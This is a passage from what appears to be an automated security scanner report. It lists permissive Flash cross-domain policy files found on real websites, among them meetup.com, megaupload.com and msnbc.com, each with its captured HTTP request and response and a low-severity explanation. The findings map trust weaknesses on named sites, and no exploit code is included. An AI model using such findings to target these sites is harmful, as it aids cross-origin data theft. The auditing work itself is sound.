<allow-access-from domain="*.medscape.com" />
<allow-access-from domain="*.medsite.com" />
<allow-access-from domain="dme.cybersessions.com" />
<allow-access-from domain="*.emedicine.com" />
<allow-access-from domain="*.digitalrhino.net" />
...[SNIP]...
7.331. http://www.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 02 Apr 2011 13:36:10 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Sat, 12 Mar 2011 00:10:17 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...
7.332. http://www.meetlocals.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meetlocals.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meetlocals.com

Response

HTTP/1.1 200 OK
Server: Zeus/4.3
Date: Sat, 02 Apr 2011 13:26:39 GMT
Connection: close
Content-Type: text/xml
Content-Length: 220
Accept-Ranges: bytes
Last-Modified: Tue, 01 Sep 2009 16:40:36 GMT

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="dev.meetlocals.com"/>
<allow-access-from domain="*.meetlocals.com"/>
</
...[SNIP]...
7.333. http://www.meetup.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meetup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meetup.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:19 GMT
Server: Apache-Coyote/1.1
ETag: W/"297-1296133256000"
Last-Modified: Thu, 27 Jan 2011 13:00:56 GMT
Content-Type: text/xml
Content-Length: 297
Vary: Accept-Encoding,User-Agent
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.meetupstatic.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.meetupstatic.com" secure="false" />
...[SNIP]...
7.334. http://www.megaupload.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.megaupload.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.megaupload.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:26 GMT
Server: Apache
Last-Modified: Sun, 28 Nov 2010 08:25:31 GMT
ETag: "275"
Accept-Ranges: bytes
Content-Length: 629
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.megarotic.com" />
<allow-access-from domain="*.sexuploader.com" />
<allow-access-from domain="*.megaupload.com" />
<allow-access-from domain="*.megarotic.com" />
<allow-access-from domain="*.megaupload.com" />
<allow-access-from domain="*.megavideo.com" />
<allow-access-from domain="*.megaflirt.com" />
<allow-access-from domain="*.megaporn.com" />
<allow-access-from domain="*.megaking.com" />
<allow-access-from domain="*.megagogo.com" />
<allow-access-from domain="*.megahelp.com" />
<allow-access-from domain="*.megabest.com" />
...[SNIP]...
7.335. http://www.megavideo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.megavideo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.megavideo.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:18 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2010 03:41:12 GMT
ETag: "23ba86c-2a2-49628d7e7e600"
Accept-Ranges: bytes
Content-Length: 674
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.megarotic.com" />
<allow-access-from domain="*.sexuploader.com" />
<allow-access-from domain="*.megaupload.com" />
<allow-access-from domain="*.megarotic.com" />
<allow-access-from domain="*.megaupload.com" />
<allow-access-from domain="*.megavideo.com" />
<allow-access-from domain="*.megaflirt.com" />
<allow-access-from domain="*.megaporn.com" />
<allow-access-from domain="*.megaking.com" />
<allow-access-from domain="*.megagogo.com" />
<allow-access-from domain="*.megahelp.com" />
<allow-access-from domain="*.megabest.com" />
<allow-access-from domain="*.megabox.com" />
...[SNIP]...
7.336. http://www.merck.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.merck.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.merck.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:16 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1301752756992629; path=/; expires=Sun, 01-Apr-12 13:59:16 GMT
Last-Modified: Sun, 07 Mar 2010 22:22:21 GMT
ETag: "678c00-d7-61d24140"
Accept-Ranges: bytes
Content-Length: 215
P3P: policyref="http://www.merck.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OUR DELa LEG PHY ONL UNI COM NAV INT DEM STA HEA PRE LOC"
Connection: close
Content-Type: application/xml
Set-Cookie: BIGipServerwww.merck.com-HTTP=42274988.20480.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*. akamai.net" />
</cross-
...[SNIP]...
7.337. http://www.merriam-webster.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.merriam-webster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.merriam-webster.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 21 Aug 2010 17:55:02 GMT
ETag: "33c24f-147-48e591d522980"
Content-Type: application/xml
Content-Length: 327
Date: Sat, 02 Apr 2011 12:44:02 GMT
X-Varnish: 589058149
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>        
<allow-access-from domain="vindicoasset.edgesuite.net" />
<allow-access-from domain="*.m-w.com" />
<allow-access-from domain="*.merriam-webster.com" />
...[SNIP]...
7.338. http://www.military.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.military.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.military.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:28:32 GMT
Server: Apache
Cache-Control: max-age=6000
Expires: Sat, 02 Apr 2011 15:08:32 GMT
Last-Modified: Thu, 08 Nov 2007 18:12:47 GMT
ETag: "9c46-79-4733519f"
Accept-Ranges: bytes
Content-Length: 121
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.military.com" />
</cross-domain-policy>

7.339. http://www.mindjolt.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mindjolt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mindjolt.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:44 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 04 Jan 2010 21:49:49 GMT
ETag: "360144-1df-47c5db34fd940"
Accept-Ranges: bytes
Content-Length: 479
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="static.mindjolt.com" />
<allow-access-from domain="cache.mindjolt.com" />
<allow-access-from domain="flash.mindjolt.com" />
<allow-access-from domain="cdn.mindjolt.com" />
<allow-access-from domain="*.mindjolt.com" />
<allow-access-from domain="devflash.mindjolt.com" />
...[SNIP]...
7.340. http://www.miniclip.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.miniclip.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.miniclip.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Fri, 04 Mar 2011 15:14:10 GMT
ETag: "644c-683-49da999127480"
Content-Type: text/xml
X-Cacheable: YES
Content-Length: 1667
Date: Sat, 02 Apr 2011 13:25:39 GMT
X-Varnish: 420130408 420121234
Age: 484
Via: 1.1 varnish
Connection: close
X-Served-By: webftl77
X-Cache: HIT
X-Cache-Hits: 16

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="66.165.172.181" />
   <allow-access-from domain="85.112.4.227" />
   <allow-access-from domain="76.74.147.153" />
   <allow-access-from domain="76.74.147.154" />
   <allow-access-from domain="77.73.32.96" />
   <allow-access-from domain="77.73.32.120" />
   <allow-access-from domain="77.73.36.99" />
   <allow-access-from domain="miniclip.com" />
   <allow-access-from domain="*.miniclip.com" />
   <allow-access-from domain="*.icq.com" />
   <allow-access-from domain="ads.miniclip.com" />
   <allow-access-from domain="cms.miniclip.com" />
   <allow-access-from domain="devcms.miniclip.com" />
   <allow-access-from domain="bakery.devcms.miniclip.com" />
   <allow-access-from domain="developers.miniclip.com" />
   <allow-access-from domain="limao.miniclip.com" />
   <allow-access-from domain="www.sketchstar.com" />
   <allow-access-from domain="gamebakers.com" />
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" />
   <allow-access-from domain="facebook.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="apps.facebook.com" />
   <allow-access-from domain="facebook.beta.cms.miniclip.com" />
   <allow-access-from domain="facebook.beta.devcms.miniclip.com" />
   <allow-access-from domain="chat.kongregate.com" />
   <allow-access-from domain="www.newgrounds.com" />
   <allow-access-from domain="uploads.ungrounded.net" />
   <allow-access-from domain="www.basoft.co.uk" />
...[SNIP]...
7.341. http://www.miracleworkers.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.miracleworkers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.miracleworkers.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT
Accept-Ranges: bytes
ETag: "d62146eddfb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sat, 02 Apr 2011 13:54:04 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...
7.342. http://www.mocospace.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mocospace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mocospace.com

Response

HTTP/1.0 200 OK
Server: Resin/4.0.6
ETag: "HMreoUE2dEZ"
Last-Modified: Wed, 30 Mar 2011 14:01:53 GMT
Accept-Ranges: bytes
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Content-Length: 702
Date: Sat, 02 Apr 2011 13:53:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*.edgesuite.net" />
   <allow-access-from domain="img.mocospace.com.edgesuite.net" />
   <allow-access-from domain="*.mocospace.com" />
   <allow-access-from domain="mocospace.com" />
   <allow-access-from domain="*.sixthgearstudios.com" />
   <allow-access-from domain="sixthgearstudios.com" />
   <allow-access-from domain="*.buddylube.com" />
   <allow-access-from domain="buddylube.com" />
...[SNIP]...
7.343. http://www.modelmayhem.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.modelmayhem.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.modelmayhem.com

Response

HTTP/1.1 200 OK
Server: IBSrv 1.0
Date: Sat, 02 Apr 2011 13:34:56 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 03 Nov 2009 23:44:35 GMT
ETag: "c0b934-11f-4778013969ec0"
Accept-Ranges: bytes
Content-Length: 287
Vary: Accept-Encoding
Set-Cookie: BIGipServermodelmayhem_POOL=1189417132.0.0000; path=/

<cross-domain-policy>
   <allow-access-from domain="*.llnwd.net" />
   <allow-access-from domain="*.modelmayhem.com" />
   <allow-access-from domain="*.ezpservices.com" />
   <allow-access-from domain="*.ezprints.com" />
   <allow-access-from domain="*.ezpservices.com" />
...[SNIP]...
7.344. http://www.moshimonsters.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moshimonsters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moshimonsters.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:07 GMT
Server: Apache
Last-Modified: Wed, 19 Aug 2009 10:48:50 GMT
ETag: "7ac712-107-4717c6159c880"
Accept-Ranges: bytes
Content-Length: 263
Content-Type: application/xml
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
   <allow-access-from domain="*.moshimonsters.com" />
   <allow-access-from domain="*.mmcdn.net" />
...[SNIP]...
7.345. http://www.moviesunlimited.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.moviesunlimited.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviesunlimited.com

Response

HTTP/1.1 200 OK
Content-Length: 389
Content-Type: text/xml
Last-Modified: Wed, 24 Jun 2009 13:43:34 GMT
Accept-Ranges: bytes
ETag: "b32792c4d1f4c91:3442"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:31 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="moviesunlimited.com" />
<allow-access-from domain="*.moviesunlimited.com" />
<allow-access-from domain="movieunlimited.com" />
<allow-access-from domain="*.movieunlimited.com" />
<allow-access-from domain="moviefanfare.com" />
   <allow-access-from domain="*.moviefanfare.com" />
...[SNIP]...
7.346. http://www.msnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 23 Feb 2011 23:37:53 GMT
Accept-Ranges: bytes
ETag: "801e8fb0b2d3cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:46:09 GMT
Connection: close
Content-Length: 3794

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
...[SNIP]...
7.347. http://www.mybloglog.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mybloglog.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mybloglog.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:42:53 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
7.348. http://www.mycokerewards.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.mycokerewards.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mycokerewards.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 08 Mar 2010 11:29:26 GMT
ETag: "404531-3a8-60a69180"
Accept-Ranges: bytes
Content-Length: 936
Content-Type: text/xml
Expires: Sat, 02 Apr 2011 13:35:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:35:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.mycokerewards.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mcrpointsplus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dietcoke.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sprite.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fanta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.drinkvault.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dasani.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mycoke.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dietcoke.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cokezero.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.us.powerade.com" secure="false"/>
...[SNIP]...
